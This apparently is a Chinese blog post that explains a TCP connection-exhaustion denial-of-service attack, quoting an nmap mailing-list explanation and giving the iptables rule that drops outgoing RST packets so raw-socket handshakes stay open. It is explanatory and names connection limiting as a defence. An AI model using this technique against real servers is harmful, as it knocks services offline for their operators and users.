最近瑞典两个人吹的比较火的东,但是他们一直没有说出一些细节性质的东西,大家根据他们的访谈,推测是之前的一个DoS攻击。
nmap邮件列表里面的一个讨论:
http://insecure.org/stf/tcp-dos-attack-explained.html
基本思想:
The basic idea is to first firewall your source address(es) using a
command such as iptables (on Linux) to prevent your own OS from
interfering with your attack. Next you create hundreds or thousands of
connections to the TCP port you are targeting (such as port 80 of a web
server) as follows:
- Attacker sends a TCP SYN packet to the target port from his own IP
address (or one he controls) to request a connection.
- The target port is open, so it will respond with a SYN/ACK
packet—the 2nd step of
the . Remember that Attacker sent the SYN as a raw
packet from userland rather than using his operating system's
connect() API to establish the connections. So when Attacker's
operating system's TCP stack sees the unexpected SYN/ACK come back, it
would normally destroy the nascent connection by sending a reset (RST)
packet. This is why the special firewall rule was mentioned—to
prevent such interference by Attacker's OS. Instead Attacker's DoS
client handles all these packets by sniffing them from userland
(generally using libpcap) and building/sending the raw reply packets.
- Using the initial sequence number and other information from the
SYN/ACK, Attacker sends an acknowledgment packet (the final step of
the 3-way handshake) to complete the connection.
实际上就是利用原始套接字,不维护连接,并且在防火墙上将RST DROP掉。
#iptables -A OUTPUT -p tcp --tcp-flags ACK,RST ACK,RST -j DROP
这样,一个机器与目标机器建立6万个连接,这样目标机器就需要维护6万个连接,需要占用大量的资源。
这种攻击的防御,最简单就是限制连接数,不过有些dirty;-)
不过,还是等待09年,那两个人公开他们的研究再说吧,关键词:New Denial-of-Service Attack Is a Killer
阅读(2013) | 评论(2) | 转发(0) |
